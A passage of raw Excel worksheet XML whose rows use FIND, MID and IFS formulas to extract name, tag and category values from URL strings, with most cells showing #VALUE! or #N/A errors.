    ISNUMBER(FIND("category",$A1404)), MID($A1404, FIND("category",$A1404) + 9, LEN($A1404) - FIND("category",$A1404)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1404" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1405" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1405" t="s">
        <v>2369</v>
      </c>
      <c r="B1405" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1405" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1405" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1405" t="e" cm="1">
        <f t="array" ref="E1405">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1405)), MID($A1405, FIND("name=",$A1405) + 5, LEN($A1405) - FIND("name=",$A1405)),
    ISNUMBER(FIND("tag/",$A1405)), MID($A1405, FIND("tag/",$A1405) + 4, LEN($A1405) - FIND("tag/",$A1405)),
    ISNUMBER(FIND("category",$A1405)), MID($A1405, FIND("category",$A1405) + 9, LEN($A1405) - FIND("category",$A1405)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1405" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1406" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1406" t="s">
        <v>2248</v>
      </c>
      <c r="B1406" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1406" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1406" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1406" t="e" cm="1">
        <f t="array" ref="E1406">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1406)), MID($A1406, FIND("name=",$A1406) + 5, LEN($A1406) - FIND("name=",$A1406)),
    ISNUMBER(FIND("tag/",$A1406)), MID($A1406, FIND("tag/",$A1406) + 4, LEN($A1406) - FIND("tag/",$A1406)),
    ISNUMBER(FIND("category",$A1406)), MID($A1406, FIND("category",$A1406) + 9, LEN($A1406) - FIND("category",$A1406)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1406" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1407" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1407" t="s">
        <v>2248</v>
      </c>
      <c r="B1407" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1407" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1407" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1407" t="e" cm="1">
        <f t="array" ref="E1407">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1407)), MID($A1407, FIND("name=",$A1407) + 5, LEN($A1407) - FIND("name=",$A1407)),
    ISNUMBER(FIND("tag/",$A1407)), MID($A1407, FIND("tag/",$A1407) + 4, LEN($A1407) - FIND("tag/",$A1407)),
    ISNUMBER(FIND("category",$A1407)), MID($A1407, FIND("category",$A1407) + 9, LEN($A1407) - FIND("category",$A1407)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1407" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1408" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1408" t="s">
        <v>2564</v>
      </c>
      <c r="B1408" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1408" t="str">
        <f t="shared" si="65"/>
        <v>splitsvilla/</v>
      </c>
      <c r="D1408" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1408" t="str" cm="1">
        <f t="array" ref="E1408">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1408)), MID($A1408, FIND("name=",$A1408) + 5, LEN($A1408) - FIND("name=",$A1408)),
    ISNUMBER(FIND("tag/",$A1408)), MID($A1408, FIND("tag/",$A1408) + 4, LEN($A1408) - FIND("tag/",$A1408)),
    ISNUMBER(FIND("category",$A1408)), MID($A1408, FIND("category",$A1408) + 9, LEN($A1408) - FIND("category",$A1408)))</f>
        <v>splitsvilla/</v>
      </c>
      <c r="F1408" t="s">
        <v>3368</v>
      </c>
    </row>
    <row r="1409" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1409" t="s">
        <v>2248</v>
      </c>
      <c r="B1409" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1409" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1409" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1409" t="e" cm="1">
        <f t="array" ref="E1409">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1409)), MID($A1409, FIND("name=",$A1409) + 5, LEN($A1409) - FIND("name=",$A1409)),
    ISNUMBER(FIND("tag/",$A1409)), MID($A1409, FIND("tag/",$A1409) + 4, LEN($A1409) - FIND("tag/",$A1409)),
    ISNUMBER(FIND("category",$A1409)), MID($A1409, FIND("category",$A1409) + 9, LEN($A1409) - FIND("category",$A1409)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1409" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1410" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1410" t="s">
        <v>2248</v>
      </c>
      <c r="B1410" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1410" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1410" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1410" t="e" cm="1">
        <f t="array" ref="E1410">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1410)), MID($A1410, FIND("name=",$A1410) + 5, LEN($A1410) - FIND("name=",$A1410)),
    ISNUMBER(FIND("tag/",$A1410)), MID($A1410, FIND("tag/",$A1410) + 4, LEN($A1410) - FIND("tag/",$A1410)),
    ISNUMBER(FIND("category",$A1410)), MID($A1410, FIND("category",$A1410) + 9, LEN($A1410) - FIND("category",$A1410)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1410" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1411" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1411" t="s">
        <v>2248</v>
      </c>
      <c r="B1411" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1411" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1411" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1411" t="e" cm="1">
        <f t="array" ref="E1411">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1411)), MID($A1411, FIND("name=",$A1411) + 5, LEN($A1411) - FIND("name=",$A1411)),
    ISNUMBER(FIND("tag/",$A1411)), MID($A1411, FIND("tag/",$A1411) + 4, LEN($A1411) - FIND("tag/",$A1411)),
    ISNUMBER(FIND("category",$A1411)), MID($A1411, FIND("category",$A1411) + 9, LEN($A1411) - FIND("category",$A1411)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1411" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1412" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1412" t="s">
        <v>2377</v>
      </c>
      <c r="B1412" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1412" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1412" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1412" t="e" cm="1">
        <f t="array" ref="E1412">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1412)), MID($A1412, FIND("name=",$A1412) + 5, LEN($A1412) - FIND("name=",$A1412)),
    ISNUMBER(FIND("tag/",$A1412)), MID($A1412, FIND("tag/",$A1412) + 4, LEN($A1412) - FIND("tag/",$A1412)),
    ISNUMBER(FIND("category",$A1412)), MID($A1412, FIND("category",$A1412) + 9, LEN($A1412) - FIND("category",$A1412)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1412" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1413" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1413" t="s">
        <v>2377</v>
      </c>
      <c r="B1413" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1413" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1413" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1413" t="e" cm="1">
        <f t="array" ref="E1413">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1413)), MID($A1413, FIND("name=",$A1413) + 5, LEN($A1413) - FIND("name=",$A1413)),
    ISNUMBER(FIND("tag/",$A1413)), MID($A1413, FIND("tag/",$A1413) + 4, LEN($A1413) - FIND("tag/",$A1413)),
    ISNUMBER(FIND("category",$A1413)), MID($A1413, FIND("category",$A1413) + 9, LEN($A1413) - FIND("category",$A1413)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1413" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1414" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1414" t="s">
        <v>2368</v>
      </c>
      <c r="B1414" t="e">
        <f t="shared" ref="B1414:B1477" si="67">IF(FIND("name=",A1414,1)&gt;0,MID(A1414,FIND("name=",A1414,1)+5,LEN(A1414)-FIND("name=",A1414,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C1414" t="e">
        <f t="shared" ref="C1414:C1477" si="68">IF(FIND("tag/",$A1414,1)&gt;0,MID($A1414,FIND("tag/",$A1414,1)+4,LEN($A1414)-FIND("tag/",$A1414,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D1414" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1414" t="e" cm="1">
        <f t="array" ref="E1414">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1414)), MID($A1414, FIND("name=",$A1414) + 5, LEN($A1414) - FIND("name=",$A1414)),
    ISNUMBER(FIND("tag/",$A1414)), MID($A1414, FIND("tag/",$A1414) + 4, LEN($A1414) - FIND("tag/",$A1414)),
    ISNUMBER(FIND("category",$A1414)), MID($A1414, FIND("category",$A1414) + 9, LEN($A1414) - FIND("category",$A1414)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1414" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1415" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1415" t="s">
        <v>2248</v>
      </c>
      <c r="B1415" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1415" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1415" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1415" t="e" cm="1">
        <f t="array" ref="E1415">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1415)), MID($A1415, FIND("name=",$A1415) + 5, LEN($A1415) - FIND("name=",$A1415)),
    ISNUMBER(FIND("tag/",$A1415)), MID($A1415, FIND("tag/",$A1415) + 4, LEN($A1415) - FIND("tag/",$A1415)),
    ISNUMBER(FIND("category",$A1415)), MID($A1415, FIND("category",$A1415) + 9, LEN($A1415) - FIND("category",$A1415)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1415" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1416" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1416" t="s">
        <v>2488</v>
      </c>
      <c r="B1416" t="str">
        <f t="shared" si="67"/>
        <v>Trisha%20Krishnan&amp;date=2023-12-01</v>
      </c>
      <c r="C1416" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1416" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1416" t="str" cm="1">
        <f t="array" ref="E1416">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1416)), MID($A1416, FIND("name=",$A1416) + 5, LEN($A1416) - FIND("name=",$A1416)),
    ISNUMBER(FIND("tag/",$A1416)), MID($A1416, FIND("tag/",$A1416) + 4, LEN($A1416) - FIND("tag/",$A1416)),
    ISNUMBER(FIND("category",$A1416)), MID($A1416, FIND("category",$A1416) + 9, LEN($A1416) - FIND("category",$A1416)))</f>
        <v>Trisha%20Krishnan&amp;date=2023-12-01</v>
      </c>
      <c r="F1416" t="s">
        <v>3360</v>
      </c>
    </row>
    <row r="1417" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1417" t="s">
        <v>2488</v>
      </c>
      <c r="B1417" t="str">
        <f t="shared" si="67"/>
        <v>Trisha%20Krishnan&amp;date=2023-12-01</v>
      </c>
      <c r="C1417" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1417" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1417" t="str" cm="1">
        <f t="array" ref="E1417">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1417)), MID($A1417, FIND("name=",$A1417) + 5, LEN($A1417) - FIND("name=",$A1417)),
    ISNUMBER(FIND("tag/",$A1417)), MID($A1417, FIND("tag/",$A1417) + 4, LEN($A1417) - FIND("tag/",$A1417)),
    ISNUMBER(FIND("category",$A1417)), MID($A1417, FIND("category",$A1417) + 9, LEN($A1417) - FIND("category",$A1417)))</f>
        <v>Trisha%20Krishnan&amp;date=2023-12-01</v>
      </c>
      <c r="F1417" t="s">
        <v>3360</v>
      </c>
    </row>
    <row r="1418" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1418" t="s">
        <v>2248</v>
      </c>
      <c r="B1418" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1418" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1418" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1418" t="e" cm="1">
        <f t="array" ref="E1418">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1418)), MID($A1418, FIND("name=",$A1418) + 5, LEN($A1418) - FIND("name=",$A1418)),
    ISNUMBER(FIND("tag/",$A1418)), MID($A1418, FIND("tag/",$A1418) + 4, LEN($A1418) - FIND("tag/",$A1418)),
    ISNUMBER(FIND("category",$A1418)), MID($A1418, FIND("category",$A1418) + 9, LEN($A1418) - FIND("category",$A1418)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1418" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1419" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1419" t="s">
        <v>2496</v>
      </c>
      <c r="B1419" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1419" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1419" t="e">
        <f t="shared" ref="D1419:D1482" si="69">IF(FIND("category",$A1419,1)&gt;0,MID($A1419,FIND("category",$A1419,1)+9,LEN($A1419)-FIND("category",$A1419,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E1419" t="e" cm="1">
        <f t="array" ref="E1419">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1419)), MID($A1419, FIND("name=",$A1419) + 5, LEN($A1419) - FIND("name=",$A1419)),
    ISNUMBER(FIND("tag/",$A1419)), MID($A1419, FIND("tag/",$A1419) + 4, LEN($A1419) - FIND("tag/",$A1419)),
    ISNUMBER(FIND("category",$A1419)), MID($A1419, FIND("category",$A1419) + 9, LEN($A1419) - FIND("category",$A1419)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1419" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1420" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1420" t="s">
        <v>2517</v>
      </c>
      <c r="B1420" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1420" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1420" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1420" t="e" cm="1">
        <f t="array" ref="E1420">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1420)), MID($A1420, FIND("name=",$A1420) + 5, LEN($A1420) - FIND("name=",$A1420)),
    ISNUMBER(FIND("tag/",$A1420)), MID($A1420, FIND("tag/",$A1420) + 4, LEN($A1420) - FIND("tag/",$A1420)),
    ISNUMBER(FIND("category",$A1420)), MID($A1420, FIND("category",$A1420) + 9, LEN($A1420) - FIND("category",$A1420)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1420" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1421" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1421" t="s">
        <v>2518</v>
      </c>
      <c r="B1421" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1421" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1421" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1421" t="e" cm="1">
        <f t="array" ref="E1421">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1421)), MID($A1421, FIND("name=",$A1421) + 5, LEN($A1421) - FIND("name=",$A1421)),
    ISNUMBER(FIND("tag/",$A1421)), MID($A1421, FIND("tag/",$A1421) + 4, LEN($A1421) - FIND("tag/",$A1421)),
    ISNUMBER(FIND("category",$A1421)), MID($A1421, FIND("category",$A1421) + 9, LEN($A1421) - FIND("category",$A1421)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1421" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1422" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1422" t="s">
        <v>2377</v>
      </c>
      <c r="B1422" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1422" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1422" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1422" t="e" cm="1">
        <f t="array" ref="E1422">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1422)), MID($A1422, FIND("name=",$A1422) + 5, LEN($A1422) - FIND("name=",$A1422)),
    ISNUMBER(FIND("tag/",$A1422)), MID($A1422, FIND("tag/",$A1422) + 4, LEN($A1422) - FIND("tag/",$A1422)),
    ISNUMBER(FIND("category",$A1422)), MID($A1422, FIND("category",$A1422) + 9, LEN($A1422) - FIND("category",$A1422)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1422" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1423" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1423" t="s">
        <v>2565</v>
      </c>
      <c r="B1423" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1423" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1423" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1423" t="e" cm="1">
        <f t="array" ref="E1423">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1423)), MID($A1423, FIND("name=",$A1423) + 5, LEN($A1423) - FIND("name=",$A1423)),
    ISNUMBER(FIND("tag/",$A1423)), MID($A1423, FIND("tag/",$A1423) + 4, LEN($A1423) - FIND("tag/",$A1423)),
    ISNUMBER(FIND("category",$A1423)), MID($A1423, FIND("category",$A1423) + 9, LEN($A1423) - FIND("category",$A1423)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1423" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1424" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1424" t="s">
        <v>2377</v>
      </c>
      <c r="B1424" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1424" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1424" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1424" t="e" cm="1">
        <f t="array" ref="E1424">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1424)), MID($A1424, FIND("name=",$A1424) + 5, LEN($A1424) - FIND("name=",$A1424)),
    ISNUMBER(FIND("tag/",$A1424)), MID($A1424, FIND("tag/",$A1424) + 4, LEN($A1424) - FIND("tag/",$A1424)),
    ISNUMBER(FIND("category",$A1424)), MID($A1424, FIND("category",$A1424) + 9, LEN($A1424) - FIND("category",$A1424)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1424" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1425" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1425" t="s">
        <v>2403</v>
      </c>
      <c r="B1425" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1425" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1425" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1425" t="e" cm="1">
        <f t="array" ref="E1425">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1425)), MID($A1425, FIND("name=",$A1425) + 5, LEN($A1425) - FIND("name=",$A1425)),
    ISNUMBER(FIND("tag/",$A1425)), MID($A1425, FIND("tag/",$A1425) + 4, LEN($A1425) - FIND("tag/",$A1425)),
    ISNUMBER(FIND("category",$A1425)), MID($A1425, FIND("category",$A1425) + 9, LEN($A1425) - FIND("category",$A1425)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1425" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1426" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1426" t="s">
        <v>2346</v>
      </c>
      <c r="B1426" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1426" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1426" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1426" t="e" cm="1">
        <f t="array" ref="E1426">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1426)), MID($A1426, FIND("name=",$A1426) + 5, LEN($A1426) - FIND("name=",$A1426)),
    ISNUMBER(FIND("tag/",$A1426)), MID($A1426, FIND("tag/",$A1426) + 4, LEN($A1426) - FIND("tag/",$A1426)),
    ISNUMBER(FIND("category",$A1426)), MID($A1426, FIND("category",$A1426) + 9, LEN($A1426) - FIND("category",$A1426)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1426" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1427" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1427" t="s">
        <v>2377</v>
      </c>
      <c r="B1427" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1427" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1427" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1427" t="e" cm="1">
        <f t="array" ref="E1427">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1427)), MID($A1427, FIND("name=",$A1427) + 5, LEN($A1427) - FIND("name=",$A1427)),
    ISNUMBER(FIND("tag/",$A1427)), MID($A1427, FIND("tag/",$A1427) + 4, LEN($A1427) - FIND("tag/",$A1427)),
    ISNUMBER(FIND("category",$A1427)), MID($A1427, FIND("category",$A1427) + 9, LEN($A1427) - FIND("category",$A1427)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1427" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1428" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1428" t="s">
        <v>2248</v>
      </c>
      <c r="B1428" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1428" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1428" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1428" t="e" cm="1">
        <f t="array" ref="E1428">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1428)), MID($A1428, FIND("name=",$A1428) + 5, LEN($A1428) - FIND("name=",$A1428)),
    ISNUMBER(FIND("tag/",$A1428)), MID($A1428, FIND("tag/",$A1428) + 4, LEN($A1428) - FIND("tag/",$A1428)),
    ISNUMBER(FIND("category",$A1428)), MID($A1428, FIND("category",$A1428) + 9, LEN($A1428) - FIND("category",$A1428)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1428" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1429" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1429" t="s">
        <v>2368</v>
      </c>
      <c r="B1429" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1429" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1429" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1429" t="e" cm="1">
        <f t="array" ref="E1429">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1429)), MID($A1429, FIND("name=",$A1429) + 5, LEN($A1429) - FIND("name=",$A1429)),
    ISNUMBER(FIND("tag/",$A1429)), MID($A1429, FIND("tag/",$A1429) + 4, LEN($A1429) - FIND("tag/",$A1429)),
    ISNUMBER(FIND("category",$A1429)), MID($A1429, FIND("category",$A1429) + 9, LEN($A1429) - FIND("category",$A1429)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1429" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1430" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1430" t="s">
        <v>2566</v>
      </c>
      <c r="B1430" t="str">
        <f t="shared" si="67"/>
        <v>Priyanka%20Kumar&amp;date=2023-05-21</v>
      </c>
      <c r="C1430" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1430" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1430" t="str" cm="1">
        <f t="array" ref="E1430">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1430)), MID($A1430, FIND("name=",$A1430) + 5, LEN($A1430) - FIND("name=",$A1430)),
    ISNUMBER(FIND("tag/",$A1430)), MID($A1430, FIND("tag/",$A1430) + 4, LEN($A1430) - FIND("tag/",$A1430)),
    ISNUMBER(FIND("category",$A1430)), MID($A1430, FIND("category",$A1430) + 9, LEN($A1430) - FIND("category",$A1430)))</f>
        <v>Priyanka%20Kumar&amp;date=2023-05-21</v>
      </c>
      <c r="F1430" t="s">
        <v>3369</v>
      </c>
    </row>
    <row r="1431" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1431" t="s">
        <v>2248</v>
      </c>
      <c r="B1431" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1431" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1431" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1431" t="e" cm="1">
        <f t="array" ref="E1431">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1431)), MID($A1431, FIND("name=",$A1431) + 5, LEN($A1431) - FIND("name=",$A1431)),
    ISNUMBER(FIND("tag/",$A1431)), MID($A1431, FIND("tag/",$A1431) + 4, LEN($A1431) - FIND("tag/",$A1431)),
    ISNUMBER(FIND("category",$A1431)), MID($A1431, FIND("category",$A1431) + 9, LEN($A1431) - FIND("category",$A1431)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1431" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1432" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1432" t="s">
        <v>2511</v>
      </c>
      <c r="B1432" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1432" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1432" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1432" t="e" cm="1">
        <f t="array" ref="E1432">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1432)), MID($A1432, FIND("name=",$A1432) + 5, LEN($A1432) - FIND("name=",$A1432)),
    ISNUMBER(FIND("tag/",$A1432)), MID($A1432, FIND("tag/",$A1432) + 4, LEN($A1432) - FIND("tag/",$A1432)),
    ISNUMBER(FIND("category",$A1432)), MID($A1432, FIND("category",$A1432) + 9, LEN($A1432) - FIND("category",$A1432)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1432" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1433" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1433" t="s">
        <v>2248</v>
      </c>
      <c r="B1433" t="e">
        <f t="shared" si="67"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1433" t="e">
        <f t="shared" si="68"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1433" t="e">
        <f t="shared" si="69"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1433" t="e" cm="1">
        <f t="array" ref="E1433">_xlfn.IFS(
